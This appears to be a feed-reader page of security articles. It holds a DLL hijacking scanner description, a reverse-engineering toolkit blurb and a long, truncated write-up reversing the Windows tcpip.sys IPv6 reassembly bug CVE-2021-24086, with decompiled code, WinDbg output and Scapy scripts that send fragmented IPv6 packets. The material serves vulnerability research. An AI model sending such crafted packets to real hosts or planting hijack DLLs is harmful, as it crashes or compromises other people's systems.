Reading view

There are new articles available, click to refresh the page.

Exploiting a “Simple” Vulnerability, Part 2 – What If We Made Exploitation Harder?

Winsider Seminars & Solutions Inc.

Yarden Shafir

11 March 2021 at 21:58

[…]

DLLHSC - DLL Hijack SCanner A Tool To Assist With The Discovery Of Suitable Candidates For DLL Hijacking

KitPloit - PenTest & Hacking Tools

Zion3R

15 March 2021 at 11:30

DLL Hijack SCanner - A tool to generate leads and automate the discovery of candidates for DLL Search Order Hijacking

Contents of this repository

This repository hosts the Visual Studio project file for the tool (DLLHSC), the project file for the API hooking functionality (detour), the project file for the payload and last but not least the compiled executables for x86 and x64 architecture (in the release section of this repo). The code was written and compiled with Visual Studio Community 2019.

If you choose to compile the tool from source, you will need to compile the projects DLLHSC, detour and payload. The DLLHSC implements the core functionality of this tool. The detour project generates a DLL that is used to hook APIs. And the payload project generates the DLL that is used as a proof of concept to check if the tested executable can load it via search order hijacking. The generated payload has to be placed in the same directory with DLLHSC and detour named payload32.dll for x86 and payload64.dll for x64 architecture.

Modes of operation

The tool implements 3 modes of operation which are explained below.

Lightweight Mode

Loads the executable image in memory, parses the Import table and then replaces any DLL referred in the Import table with a payload DLL.

The tool places in the application directory only a module (DLL) the is not present in the application directory, does not belong to WinSxS and does not belong to the KnownDLLs.

The payload DLL upon execution, creates a file in the following path: C:\Users\%USERNAME%\AppData\Local\Temp\DLLHSC.tmp as a proof of execution. The tool launches the application and reports if the payload DLL was executed by checking if the temporary file exists. As some executables import functions from the DLLs they load, error message boxes may be shown up when the provided DLL fails to export these functions and thus meet the dependencies of the provided image. However, the message boxes indicate the DLL may be a good candidate for payload execution if the dependencies are met. In this case, additional analysis is required. The title of these message boxes may contain the strings: Ordinal Not Found or Entry Point Not Found. DLLHSC looks for windows that contain these strings, closes them as soon as they shown up and reports the results.

List Modules Mode

Creates a process with the provided executable image, enumerates the modules that are loaded in the address space of this process and reports the results after applying filters.

The tool only reports the modules loaded from the System directory and do not belong to the KnownDLLs. The results are leads that require additional analysis. The analyst can then place the reported modules in the application directory and check if the application loads the provided module instead.

Run-Time Mode

Hooks the LoadLibrary and LoadLibraryEx APIs via Microsoft Detours and reports the modules that are loaded in run-time.

Each time the scanned application calls LoadLibrary and LoadLibraryEx, the tool intercepts the call and writes the requested module in the file C:\Users\%USERNAME%\AppData\Local\Temp\DLLHSCRTLOG.tmp. If the LoadLibraryEx is specifically called with the flag LOAD_LIBRARY_SEARCH_SYSTEM32, no output is written to the file. After all interceptions have finished, the tool reads the file and prints the results. Of interest for further analysis are modules that do not exist in the KnownDLLs registry key, modules that do not exist in the System directory and modules with no full path (for these modules loader applies the normal search order).

Compile and Run Guidance

Should you choose to compile the tool from source it is recommended to do so on Visual Code Studio 2019. In order the tool to function properly, the projects DLLHSC, detour and payload have to be compiled for the same architecture and then placed in the same directory. Please note that the DLL generated from the project payload has to be renamed to payload32.dll for 32-bit architecture or payload64.dll for 64-bit architecture.

Help menu

The help menu for this application

NAME
        dllhsc - DLL Hijack SCanner

SYNOPSIS
        dllhsc.exe -h

        dllhsc.exe -e <executable image path> (-l|-lm|-rt) [-t seconds]

DESCRIPTION
        DLLHSC scans a given executable image for DLL Hijacking and reports the results

        It requires elevated privileges

OPTIONS
        -h, --help
                display this help menu and exit

        -e, --executable-image
                executable image to scan

        -l, --lightweight
                parse the import table, attempt to launch a payload and report the results

        -lm, --list-modules
                list loaded modules that do not exist in the application's directory

        -rt, --runtime-load
                display modules loaded in run-time by hooking LoadLibrary and LoadLibraryEx APIs

        -t, --timeout
                number of seconds to wait f   or checking any popup error windows - defaults to 10 seconds

Example Runs

This section provides examples on how you can run DLLHSC and the results it reports. For this purpose, the legitimate Microsoft utility OleView.exe (MD5: D1E6767900C85535F300E08D76AAC9AB) was used. For better results, it is recommended that the provided executable image is scanned within its installation directory.

The flag -l parses the import table of the provided executable, applies filters and attempts to weaponize the imported modules by placing a payload DLL in the application's current directory. The scanned executable may pop an error box when dependencies for the payload DLL (exported functions) are not met. In this case, an error message box is poped. DLLHSC by default checks for 10 seconds if a message box was opened or for as many seconds as specified by the user with the flag -t. An error message box indicates that if dependencies are met, the module can be weaponized.

The following screenshot shows the error message box generated when OleView.dll loads the payload DLL :

The tool waits for a maximum timeframe of 10 seconds or -t seconds to make sure the process initialization has finished and any message box has been generated. It then detects the message box, closes it and reports the result:

The flag -lm launches the provided executable and prints the modules it loads that do not belong in the KnownDLLs list neither are WinSxS dependencies. This mode is aimed to give an idea of DLLs that may be used as payload and it only exists to generate leads for the analyst.

The flag -rt prints the modules the provided executable image loads in its address space when launched as a process. This is achieved by hooking the LoadLibrary and LoadLibraryEx APIs via Microsoft Detours.

Feedback

For any feedback on this tool, please use the GitHub Issues section.

Download DLLHSC

Retoolkit - Reverse Engineer's Toolkit

KitPloit - PenTest & Hacking Tools

Zion3R

26 March 2021 at 11:30

This is a collection of tools you may like if you are interested on reverse engineering and/or malware analysis on x86 and x64 Windows systems. After installing this toolkit you'll have a folder in your desktop with shortcuts to RE tools like these:

Why do I need it?

You don't. Obviously, you can download such tools from their own website and install them by yourself in a new VM. But if you download retoolkit, it can probably save you some time. Additionally, the tools come pre-configured so you'll find things like x64dbg with a few plugins, command-line tools working from any directory, etc. You may like it if you're setting up a new analysis VM.

Download

The *.iss files you see here are the source code for our setup program built with Inno Setup. To download the real thing, you have to go to the Releases section and download the setup program.

Included tools

Check the wiki.

Is it safe to install it in my environment?

I don't know. Some included tools are not open source and come from shady places. You should use it exclusively in virtual machines and under your own responsibility.

Can you add tool X?

It depends. The idea is to keep it simple. We won't add a tool just because it's not here yet. But if you think there's a good reason to do so, and the license allows us to redistribuite the software, please file a request here.

Download Retoolkit

Reverse-engineering tcpip.sys: mechanics of a packet of the death (CVE-2021-24086)

Diary of a reverse-engineer

Axel "0vercl0k" Souchet

15 April 2021 at 15:00

Introduction

Since the beginning of my journey in computer security I have always been amazed and fascinated by true remote vulnerabilities. By true remotes, I mean bugs that are triggerable remotely without any user interaction. Not even a single click. As a result I am always on the lookout for such vulnerabilities.

On the Tuesday 13th of October 2020, Microsoft released a patch for CVE-2020-16898 which is a vulnerability affecting Windows' tcpip.sys kernel-mode driver dubbed Bad neighbor. Here is the description from Microsoft:

A remote code execution vulnerability exists when the Windows TCP/IP stack improperly
handles ICMPv6 Router Advertisement packets. An attacker who successfully exploited this vulnerability could gain
the ability to execute code on the target server or client. To exploit this vulnerability, an attacker would have
to send specially crafted ICMPv6 Router Advertisement packets to a remote Windows computer.
The update addresses the vulnerability by correcting how the Windows TCP/IP stack handles ICMPv6 Router Advertisement
packets.

The vulnerability really did stand out to me: remote vulnerabilities affecting TCP/IP stacks seemed extinct and being able to remotely trigger a memory corruption in the Windows kernel is very interesting for an attacker. Fascinating.

Hadn't diffed Microsoft patches in years I figured it would be a fun exercise to go through. I knew that I wouldn't be the only one working on it as those unicorns get a lot of attention from internet hackers. Indeed, my friend pi3 was so fast to diff the patch, write a PoC and write a blogpost that I didn't even have time to start, oh well :)

That is why when Microsoft blogged about another set of vulnerabilities being fixed in tcpip.sys I figured I might be able to work on those this time. Again, I knew for a fact that I wouldn't be the only one racing to write the first public PoC for CVE-2021-24086 but somehow the internet stayed silent long enough for me to complete this task which is very surprising :)

In this blogpost I will take you on my journey from zero to BSoD. From diffing the patches, reverse-engineering tcpip.sys and fighting our way through writing a PoC for CVE-2021-24086. If you came here for the code, fair enough, it is available on my github: 0vercl0k/CVE-2021-24086.

Table of contents:

TL;DR

For the readers that want to get the scoop, CVE-2021-24086 is a NULL dereference in tcpip!Ipv6pReassembleDatagram that can be triggered remotely by sending a series of specially crafted packets. The issue happens because of the way the code treats the network buffer:

void Ipv6pReassembleDatagram(Packet_t *Packet, Reassembly_t *Reassembly, char OldIrql)
{
  // ...
  const uint32_t UnfragmentableLength = Reassembly->UnfragmentableLength;
  const uint32_t TotalLength = UnfragmentableLength + Reassembly->DataLength;
  const uint32_t HeaderAndOptionsLength = UnfragmentableLength + sizeof(ipv6_header_t);
  // …
  NetBufferList = (_NET_BUFFER_LIST *)NetioAllocateAndReferenceNetBufferAndNetBufferList(
                                        IppReassemblyNetBufferListsComplete,
                                        Reassembly,
                                        0,
                                        0,
                                        0,
                                        0);
  if ( !NetBufferList )
  {
    // ...
    goto Bail_0;
  }

  FirstNetBuffer = NetBufferList->FirstNetBuffer;
  if ( NetioRetreatNetBuffer(FirstNetBuffer, uint16_t(HeaderAndOptionsLength), 0) < 0 )
  {
    // ...
    goto Bail_1;
  }

  Buffer = (ipv6_header_t *)NdisGetDataBuffer(FirstNetBuffer, HeaderAndOptionsLength, 0i64, 1u, 0);
  //...
  *Buffer = Reassembly->Ipv6;

A fresh NetBufferList (abbreviated NBL) is allocated by NetioAllocateAndReferenceNetBufferAndNetBufferList and NetioRetreatNetBuffer allocates a Memory Descriptor List (abbreviated MDL) of uint16_t(HeaderAndOptionsLength) bytes. This integer truncation from uint32_t is important.

Once the network buffer has been allocated, NdisGetDataBuffer is called to gain access to a contiguous block of data from the fresh network buffer. This time though, HeaderAndOptionsLength is not truncated which allows an attacker to trigger a special condition in NdisGetDataBuffer to make it fail. This condition is hit when uint16_t(HeaderAndOptionsLength) != HeaderAndOptionsLength. When the function fails, it returns NULL and Ipv6pReassembleDatagram blindly trusts this pointer and does a memory write, bugchecking the machine. To pull this off, you need to trick the network stack into receiving an IPv6 fragment with a very large amount of headers. Here is what the bugchecks look like:

KDTARGET: Refreshing KD connection

*** Fatal System Error: 0x000000d1
                       (0x0000000000000000,0x0000000000000002,0x0000000000000001,0xFFFFF8054A5CDEBB)

Break instruction exception - code 80000003 (first chance)

A fatal system error has occurred.
Debugger entered on first try; Bugcheck callbacks have not been invoked.

A fatal system error has occurred.

nt!DbgBreakPointWithStatus:
fffff805`473c46a0 cc              int     3

kd> kc
 # Call Site
00 nt!DbgBreakPointWithStatus
01 nt!KiBugCheckDebugBreak
02 nt!KeBugCheck2
03 nt!KeBugCheckEx
04 nt!KiBugCheckDispatch
05 nt!KiPageFault
06 tcpip!Ipv6pReassembleDatagram
07 tcpip!Ipv6pReceiveFragment
08 tcpip!Ipv6pReceiveFragmentList
09 tcpip!IppReceiveHeaderBatch
0a tcpip!IppFlcReceivePacketsCore
0b tcpip!IpFlcReceivePackets
0c tcpip!FlpReceiveNonPreValidatedNetBufferListChain
0d tcpip!FlReceiveNetBufferListChainCalloutRoutine
0e nt!KeExpandKernelStackAndCalloutInternal
0f nt!KeExpandKernelStackAndCalloutEx
10 tcpip!FlReceiveNetBufferListChain
11 NDIS!ndisMIndicateNetBufferListsToOpen
12 NDIS!ndisMTopReceiveNetBufferLists

For anybody else in for a long ride, let's get to it :)

Recon

Even though Francisco Falcon already wrote a cool blogpost discussing his work on this case, I have decided to also write up mine; I'll try to cover aspects that are less or not covered in his post like tcpip.sys internals for example.

All right, let's start by the beginning: at this point I don't know anything about tcpip.sys and I don't know anything about the bugs getting patched. Microsoft's blogpost is helpful because it gives us a bunch of clues:

There are three different vulnerabilities that seemed to involve fragmentation in IPv4 & IPv6,
Two of them are rated as Remote Code Execution which means that they cause memory corruption somehow,
One of them causes a DoS which means somehow it likely bugchecks the target.

According to this tweet we also learn that those flaws have been internally found by Microsoft's own @piazzt which is awesome.

Googling around also reveals a bunch more useful information due to the fact that it would seem that Microsoft privately shared with their partners PoCs via the MAPP program.

At this point I decided to focus on the DoS vulnerability (CVE-2021-2486) as a first step. I figured it might be easier to trigger and that I might be able to use the acquired knowledge for triggering it to understand better tcpip.sys and maybe work on the other ones if time and motivation allows.

The next logical step is to diff the patches to identify the fixes.

Diffing Microsoft patches in 2021

I honestly can't remember the last time I diff'd Microsoft patches. Probably Windows XP / Windows 7 time to be honest. Since then, a lot has changed though. The security updates are now cumulative, which means that packages embed every fix known to date. You can grab packages directly from the Microsoft Update Catalog which is handy. Last but not least, Windows Updates now use forward / reverse differentials; you can read this to know more about what it means.

Extracting and Diffing Windows Patches in 2020 is a great blog post that talks about how to unpack the patches off an update package and how to apply the differentials. The output of this work is basically the tcpip.sys binary before and after the update. If you don't feel like doing this yourself, I've uploaded the two binaries (as well as their respective public PDBs) that you can use to do the diffing yourself: 0vercl0k/CVE-2021-24086/binaries. Also, I have been made aware after publishing this post about the amazing winbindex website which indexes Windows binaries and lets you download them in a click. Here is the index available for tcpip.sys as an example.

Once we have the before and after binaries, a little dance with IDA and the good ol’ BinDiff yields the below:

There aren't a whole lot of changes to look at which is nice, and focusing on Ipv6pReassembleDatagram feels right. Microsoft's workaround mentioned disabling packet reassembly (netsh int ipv6 set global reassemblylimit=0) and this function seems to be reassembling datagrams; close enough right?

After looking at it for a little time, the patched binary introduced this new interesting looking basic block:

It ends with what looks like a comparison with the 0xffff integer and a conditional jump that either bails out or keeps going. This looks very interesting because some articles mentioned that the bug could be triggered with a packet containing a large amount of headers. Not that you should trust those types of news articles as they are usually not technically accurate and sensationalized, but there might be some truth to it. At this point, I felt pretty good about it and decided to stop diffing and start reverse-engineering. I assumed the issue would be some sort of integer overflow / truncation that would be easy to trigger based on the name of the function. We just need to send a big packet right?

Reverse-engineering tcpip.sys

This is where the real journey and the usual emotional rollercoasters when studying vulnerabilities. I initially thought I would be done with this in a few days, or a week. Oh boy, I was wrong though.

Baby steps

First thing I did was to prepare a lab environment. I installed a Windows 10 (target) and a Linux VM (attacker), set-up KDNet and kernel debugging to debug the target, installed Wireshark / Scapy (v2.4.4), created a virtual switch which the two VMs are sharing. And... finally loaded tcpip.sys in IDA. The module looked pretty big and complex at first sights - no big surprise there; it implements Windows IPv4 & IPv6 network stack after all. I started the adventure by focusing first on Ipv6pReassembleDatagram. Here is the piece of assembly code that we saw earlier in BinDiff and that looked interesting:

Great, that's a start. Before going deep down the rabbit hole of reverse-engineering, I decided to try to hit the function and be able to debug it with WinDbg. As the function name suggests reassembly I wrote the following code and threw it against my target:

from scapy.all import *

pkt = Ether() / IPv6(dst = 'ff02::1') / UDP() / ('a' * 0x1000)
sendp(fragment6(pkt, 500), iface = 'eth1')

This successfully triggers the breakpoint in WinDbg; neat:

kd> g
Breakpoint 0 hit
tcpip!Ipv6pReassembleDatagram:
fffff802`2edcdd6c 4488442418      mov     byte ptr [rsp+18h],r8b

kd> kc
 # Call Site
00 tcpip!Ipv6pReassembleDatagram
01 tcpip!Ipv6pReceiveFragment
02 tcpip!Ipv6pReceiveFragmentList
03 tcpip!IppReceiveHeaderBatch
04 tcpip!IppFlcReceivePacketsCore
05 tcpip!IpFlcReceivePackets
06 tcpip!FlpReceiveNonPreValidatedNetBufferListChain
07 tcpip!FlReceiveNetBufferListChainCalloutRoutine
08 nt!KeExpandKernelStackAndCalloutInternal
09 nt!KeExpandKernelStackAndCalloutEx
0a tcpip!FlReceiveNetBufferListChain

We can even observe the fragmented packets in Wireshark which is also pretty cool:

For those that are not familiar with packet fragmentation, it is a mechanism used to chop large packets (larger than the Maximum Transmission Unit) in smaller chunks to be able to be sent across network equipment. The receiving network stack has the burden to stitch them all together in a safe manner (winkwink).

All right, perfect. We have now what I consider a good enough research environment and we can start digging deep into the code. At this point, let's not focus on the vulnerability yet but instead try to understand how the code works, the type of arguments it receives, recover structures and the semantics of important fields, etc. Let's get our HexRays decompilation output pretty.

As you might imagine, this is the part that's the most time consuming. I use a mixture of bottom-up, top-down. Loads of experiments. Commenting the decompiled code as best as I can, challenging myself by asking questions, answering them, rinse & repeat.

High level overview

Oftentimes, studying code / features in isolation in complex systems is not enough; it only takes you so far. Complex drivers like tcpip.sys are gigantic, carry a lot of state, and are hard to reason about, both in terms of execution and data flow. In this case, there is this sort of size integer, that seems to be related to something that got received and we want to set that to 0xffff. Unfortunately, just focusing on Ipv6pReassembleDatagram and Ipv6pReceiveFragment was not enough for me to make significant progress. It was worth a try though but time to switch gears.

Zooming out

All right, that's cool, our HexRays decompiled code is getting prettier and prettier; it feels rewarding. We have abused the create new structure feature to lift a bunch of structures. We guessed about the semantics of some of them but most are still unknown. So yeah, let's work smarter.

We know that tcpip.sys receives packets from the network; we don't know exactly how or where from but maybe we don't need to know that much. One of the first questions you might ask yourself is how the kernel stores network data? What structures does it use?

NET_BUFFER & NET_BUFFER_LIST

If you have some Windows kernel experience, you might be familiar with NDIS and you might also have heard about some of the APIs and the structures it exposes to users. It is documented because third-parties can develop extensions and drivers to interact with the network stack at various points.

An important structure in this world is NET_BUFFER. This is what it looks like in WinDbg:

kd> dt NDIS!_NET_BUFFER
NDIS!_NET_BUFFER
   +0x000 Next             : Ptr64 _NET_BUFFER
   +0x008 CurrentMdl       : Ptr64 _MDL
   +0x010 CurrentMdlOffset : Uint4B
   +0x018 DataLength       : Uint4B
   +0x018 stDataLength     : Uint8B
   +0x020 MdlChain         : Ptr64 _MDL
   +0x028 DataOffset       : Uint4B
   +0x000 Link             : _SLIST_HEADER
   +0x000 NetBufferHeader  : _NET_BUFFER_HEADER
   +0x030 ChecksumBias     : Uint2B
   +0x032 Reserved         : Uint2B
   +0x038 NdisPoolHandle   : Ptr64 Void
   +0x040 NdisReserved     : [2] Ptr64 Void
   +0x050 ProtocolReserved : [6] Ptr64 Void
   +0x080 MiniportReserved : [4] Ptr64 Void
   +0x0a0 DataPhysicalAddress : _LARGE_INTEGER
   +0x0a8 SharedMemoryInfo : Ptr64 _NET_BUFFER_SHARED_MEMORY
   +0x0a8 ScatterGatherList : Ptr64 _SCATTER_GATHER_LIST

It can look overwhelming but we don't need to understand every detail. What is important is that the network data are stored in a regular MDL. As MDLs, NET_BUFFER can be chained together which allows the kernel to store a large amount of data in a bunch of non-contiguous chunks of physical memory; virtual memory is the magic wand used to make the data look contiguous. For the readers that are not familiar with Windows kernel development, an MDL is a Windows kernel construct that allows users to map physical memory in a contiguous virtual memory region. Every MDL is actually followed by a list of PFNs (which don't need to be contiguous) that the Windows kernel is able to map in a contiguous virtual memory region; magic.

kd> dt nt!_MDL
   +0x000 Next             : Ptr64 _MDL
   +0x008 Size             : Int2B
   +0x00a MdlFlags         : Int2B
   +0x00c AllocationProcessorNumber : Uint2B
   +0x00e Reserved         : Uint2B
   +0x010 Process          : Ptr64 _EPROCESS
   +0x018 MappedSystemVa   : Ptr64 Void
   +0x020 StartVa          : Ptr64 Void
   +0x028 ByteCount        : Uint4B
   +0x02c ByteOffset       : Uint4B

NET_BUFFER_LIST are basically a structure to keep track of a list of NET_BUFFERs as the name suggests:

kd> dt NDIS!_NET_BUFFER_LIST
   +0x000 Next             : Ptr64 _NET_BUFFER_LIST
   +0x008 FirstNetBuffer   : Ptr64 _NET_BUFFER
   +0x000 Link             : _SLIST_HEADER
   +0x000 NetBufferListHeader : _NET_BUFFER_LIST_HEADER
   +0x010 Context          : Ptr64 _NET_BUFFER_LIST_CONTEXT
   +0x018 ParentNetBufferList : Ptr64 _NET_BUFFER_LIST
   +0x020 NdisPoolHandle   : Ptr64 Void
   +0x030 NdisReserved     : [2] Ptr64 Void
   +0x040 ProtocolReserved : [4] Ptr64 Void
   +0x060 MiniportReserved : [2] Ptr64 Void
   +0x070 Scratch          : Ptr64 Void
   +0x078 SourceHandle     : Ptr64 Void
   +0x080 NblFlags         : Uint4B
   +0x084 ChildRefCount    : Int4B
   +0x088 Flags            : Uint4B
   +0x08c Status           : Int4B
   +0x08c NdisReserved2    : Uint4B
   +0x090 NetBufferListInfo : [29] Ptr64 Void

Again, no need to understand every detail, thinking in concepts is good enough. On top of that, Microsoft makes our life easier by providing a very useful WinDbg extension called ndiskd. It exposes two functions to dump NET_BUFFER and NET_BUFFER_LIST: !ndiskd.nb and !ndiskd.nbl respectively. These are a big time saver because they'll take care of walking the various levels of indirection: list of NET_BUFFERs and chains of MDLs.

The mechanics of parsing an IPv6 packet

Now that we know where and how network data is stored, we can ask ourselves how IPv6 packet parsing works? I have very little knowledge about networking, but I know that there are various headers that need to be parsed differently and that they can chain together. The layer N tells you what you'll find next.

What I am about to describe is what I have figured out while reverse-engineering as well as what I have observed during debugging it through a bazillions of experiments. Full disclosure: I am no expert so take it with a grain of salt :)

The top level function of interest is IppReceiveHeaderBatch. The first thing it does is to invoke IppReceiveHeadersHelper on every packet that are in the list:

if ( Packet )
{
    do
    {
        Next = Packet->Next;
        Packet->Next = 0;
        IppReceiveHeadersHelper(Packet, Protocol, ...);
        Packet = Next;
    }
    while ( Next );
}

Packet_t is an undocumented structure that is associated with received packets. A bunch of state is stored in this structure and figuring out the semantics of important fields is time consuming. IppReceiveHeadersHelper's main role is to kick off the parsing machine. It parses the IPv6 (or IPv4) header of the packet and reads the next_header field. As I mentioned above, this field is very important because it indicates how to read the next layer of the packet. This value is kept in the Packet structure, and a bunch of functions reads and updates it during parsing.

NetBufferList = Packet->NetBufferList;
HeaderSize = Protocol->HeaderSize;
FirstNetBuffer = NetBufferList->FirstNetBuffer;
CurrentMdl = FirstNetBuffer->CurrentMdl;
if ( (CurrentMdl->MdlFlags & 5) != 0 )
    Va = CurrentMdl->MappedSystemVa;
else
    Va = MmMapLockedPagesSpecifyCache(CurrentMdl, 0, MmCached, 0, 0, 0x40000000u);
IpHdr = (ipv6_header_t *)((char *)Va + FirstNetBuffer->CurrentMdlOffset);
if ( Protocol == (Protocol_t *)Ipv4Global )
{
    // ...
}
else
{
    Packet->NextHeader = IpHdr->next_header;
    Packet->NextHeaderPosition = offsetof(ipv6_header_t, next_header);
    SrcAddrOffset = offsetof(ipv6_header_t, src);
}

The function does a lot more; it initializes several Packet_t fields but let's ignore that for now to avoid getting overwhelmed by complexity. Once the function returns back in IppReceiveHeaderBatch, it extracts a demuxer off the Protocol_t structure and invokes a parsing callback if the NextHeader is a valid extension header. The Protocol_t structure holds an array of Demuxer_t (term used in the driver).

struct Demuxer_t
{
  void (__fastcall *Parse)(Packet_t *);
  void *f0;
  void *f1;
  void *Size;
  void *f3;
  _BYTE IsExtensionHeader;
  _BYTE gap[23];
};

struct Protocol_t
{
  // ...
  Demuxer_t Demuxers[277];
};

NextHeader (populated earlier in IppReceiveHeaderBatch) is the value used to index into this array.

If the demuxer is handling an extension header, then a callback is invoked to parse the header properly. This happens in a loop until the parsing hits the first part of the packet that isn't a header in which case it handles the next packet.

while ( ... )
{
    NetBufferList = RcvList->NetBufferList;
    IpProto = RcvList->NextHeader;
    if ( ... )
    {
        Demuxer = (Demuxer_t *)IpUdpEspDemux;
    }
    else
    {
        Demuxer = &Protocol->Demuxers[IpProto];
    }
    if ( !Demuxer->IsExtensionHeader )
        Demuxer = 0;
    if ( Demuxer )
        Demuxer->Parse(RcvList);
    else
        RcvList = RcvList->Next;
}

Makes sense - that's kinda how we would implement parsing of IPv6 packets as well right?

It is easy to dump the demuxers and their associated NextHeader / Parse values; these might come handy later.

- nh = 0  -> Ipv6pReceiveHopByHopOptions
- nh = 43 -> Ipv6pReceiveRoutingHeader
- nh = 44 -> Ipv6pReceiveFragmentList
- nh = 60 -> Ipv6pReceiveDestinationOptions

Demuxer can expose a callback routine for parsing which I called Parse. The Parse method receives a Packet and it is free to update its state; for example to grab the NextHeader that is needed to know how to parse the next layer. This is what Ipv6pReceiveFragmentList looks like (Ipv6FragmentDemux.Parse):

It makes sure the next header is IPPROTO_FRAGMENT before going further. Again, makes sense.

The mechanics of IPv6 fragmentation

Now that we understand the overall flow a bit more, it is a good time to start thinking about fragmentation. We know we need to send fragmented packets to hit the code that was fixed by the update, which we know is important somehow. The function that parses fragments is Ipv6pReceiveFragment and it is hairy. Again, keeping track of fragments probably warrants that, so nothing unexpected here.

It's also the right time for us to read literature about how exactly IPv6 fragmentation works. Concepts have been useful until now, but at this point we need to understand the nitty-gritty details. I don't want to spend too much time on this as there is tons of content online discussing the subject so I'll just give you the fast version. To define a fragment, you need to add a fragmentation header which is called IPv6ExtHdrFragment in Scapy land:

class IPv6ExtHdrFragment(_IPv6ExtHdr):
    name = "IPv6 Extension Header - Fragmentation header"
    fields_desc = [ByteEnumField("nh", 59, ipv6nh),
                   BitField("res1", 0, 8),
                   BitField("offset", 0, 13),
                   BitField("res2", 0, 2),
                   BitField("m", 0, 1),
                   IntField("id", None)]
    overload_fields = {IPv6: {"nh": 44}}

The most important fields for us are :

offset which tells the start offset of where the data that follows this header should be placed in the reassembled packet
the m bit that specifies whether or not this is the latest fragment.

Note that the offset field is an amount of 8 bytes blocks; if you set it to 1, it means that your data will be at +8 bytes. If you set it to 2, they'll be at +16 bytes, etc.

Here is a small ghetto IPv6 fragmentation function I wrote to ensure I was understanding things properly. I enjoy learning through practice. (Scapy has fragment6):

def frag6(target, frag_id, bytes, nh, frag_size = 1008):
    '''Ghetto fragmentation.'''
    assert (frag_size % 8) == 0
    leftover = bytes
    offset = 0
    frags = []
    while len(leftover) > 0:
        chunk = leftover[: frag_size]
        leftover = leftover[len(chunk): ]
        last_pkt = len(leftover) == 0
        # 0 -> No more / 1 -> More
        m = 0 if last_pkt else 1
        assert offset < 8191
        pkt = Ether() \
            / IPv6(dst = target) \
            / IPv6ExtHdrFragment(m = m, nh = nh, id = frag_id, offset = offset) \
            / chunk

        offset += (len(chunk) // 8)
        frags.append(pkt)
    return frags

Easy enough. The other important aspect of fragmentation in the literature is related to IPv6 headers and what is called the unfragmentable part of a packet. Here is how Microsoft describes the unfragmentable part: "This part consists of the IPv6 header, the Hop-by-Hop Options header, the Destination Options header for intermediate destinations, and the Routing header". It also is the part that precedes the fragmentation header. Obviously, if there is an unfragmentable part, there is a fragmentable part. Easy, the fragmentable part is what you are sending behind the fragmentation header. The reassembly process is the process of stitching together the unfragmentable part with the reassembled fragmentable part into one beautiful reassembled packet. Here is a diagram taken from Understanding the IPv6 Header that sums it up pretty well:

All of this theoretical information is very useful because we can now look for those details while we reverse-engineer. It is always easier to read code and try to match it against what it is supposed or expected to do.

Theory vs practice: Ipv6pReceiveFragment

At this point, I felt I had accumulated enough new information and it was time for zooming back in into the target. We want to verify that reality works like the literature says it does and by doing we will improve our overall understanding. After studying this code for a while we start to understand the big lines. The function receives a Packet but as this structure is packet specific it is not enough to track the state required to reassemble a packet. This is why another important structure is used for that; I called it Reassembly.

The overall flow is basically broken up in three main parts; again no need for us to understand every single details, let's just understand it conceptually and what/how it tries to achieve its goals:

1 - Figure out if the received fragment is part of an already existing Reassembly. According to the literature, we know that network stacks should use the source address, the destination address as well as the fragmentation header's identifier to determine if the current packet is part of a group of fragments. In practice, the function IppReassemblyHashKey hashes those fields together and the resulting hash is used to index into a hash-table that stores Reassembly structures (Ipv6pFragmentLookup):

int IppReassemblyHashKey(__int64 Iface, int Identification, __int64 Pkt)
{
  //...
  Protocol = *(_QWORD *)(Iface + 40);
  OffsetSrcIp = 12i64;
  AddressLength = *(unsigned __int16 *)(*(_QWORD *)(Protocol + 16) + 6i64);
  if ( Protocol != Ipv4Global )
    OffsetSrcIp = offsetof(ipv6_header_t, src);
  H = RtlCompute37Hash(
        g_37HashSeed,
        Pkt + OffsetSrcIp,
        AddressLength);
  OffsetDstIp = 16i64;
  if ( Protocol != Ipv4Global )
    OffsetDstIp = offsetof(ipv6_header_t, dst);
  H2 = RtlCompute37Hash(H, Pkt + OffsetDstIp, AddressLength);
  return RtlCompute37Hash(H2, &Identification, 4i64) | 0x80000000;
}

Reassembly_t* Ipv6pFragmentLookup(__int64 Iface, int Identification, ipv6_header_t *Pkt, KIRQL *OldIrql)
{
  // ...
  v5 = *(_QWORD *)Iface;
  Context.Signature = 0;
  HashKey = IppReassemblyHashKey(v5, Identification, (__int64)Pkt);
  *OldIrql = KeAcquireSpinLockRaiseToDpc(&Ipp6ReassemblyHashTableLock);
  *(_OWORD *)&Context.ChainHead = 0;
  for ( CurrentReassembly = (Reassembly_t *)RtlLookupEntryHashTable(&Ipp6ReassemblyHashTable, HashKey, &Context);
        ;
        CurrentReassembly = (Reassembly_t *)RtlGetNextEntryHashTable(&Ipp6ReassemblyHashTable, &Context) )
  {
    // If we have walked through all the entries in the hash-table,
    // then we can just bail.
    if ( !CurrentReassembly )
      return 0;
    // If the current entry matches our iface, pkt id, ip src/dst
    // then we found a match!
    if ( CurrentReassembly->Iface == Iface
      && CurrentReassembly->Identification == Identification
      && memcmp(&CurrentReassembly->Ipv6.src.u.Byte[0], &Pkt->src.u.Byte[0], 16) == 0
      && memcmp(&CurrentReassembly->Ipv6.dst.u.Byte[0], &Pkt->dst.u.Byte[0], 16) == 0 )
    {
      break;
    }
  }
  // ...
  return CurrentReassembly;
}

1.1 - If the fragment doesn't belong to any known group, it needs to be put in a newly created Reassembly. This is what IppCreateInReassemblySet does. It's worth noting that this is a point of interest for a reverse-engineer because this is where the Reassembly object gets allocated and constructed (in IppCreateReassembly). It means we can retrieve its size as well as some more information about some of the fields.

Reassembly_t *IppCreateInReassemblySet(
    PKSPIN_LOCK SpinLock, void *Src, __int64 Iface, __int64 Identification, KIRQL NewIrql
)
{
  Reassembly_t *Reassembly = IppCreateReassembly(Src, Iface, Identification);
  if ( Reassembly )
  {
    IppInsertReassembly((__int64)SpinLock, Reassembly);
    KeAcquireSpinLockAtDpcLevel(&Reassembly->Lock);
    KeReleaseSpinLockFromDpcLevel(SpinLock);
  }
  else
  {
    KeReleaseSpinLock(SpinLock, NewIrql);
  }
  return Reassembly;
}

2 - Now that we have a Reassembly structure, the main function wants to figure out where the current fragment fits in the overall reassembled packet. The Reassembly keeps track of fragments using various lists. It uses a ContiguousList that chains fragments that will be contiguous in the reassembled packet. IppReassemblyFindLocation is the function that seems to implement the logic to figure out where the current fragment fits.
2.1 - If IppReassemblyFindLocation returns a pointer to the start of the ContiguousList, it means that the current packet is the first fragment. This is where the function extracts and keeps track of the unfragmentable part of the packet. It is kept in a pool buffer that is referenced in the Reassembly structure.

if ( ReassemblyLocation == &Reassembly->ContiguousStartList )
{
  Reassembly->NextHeader = Fragment->nexthdr;
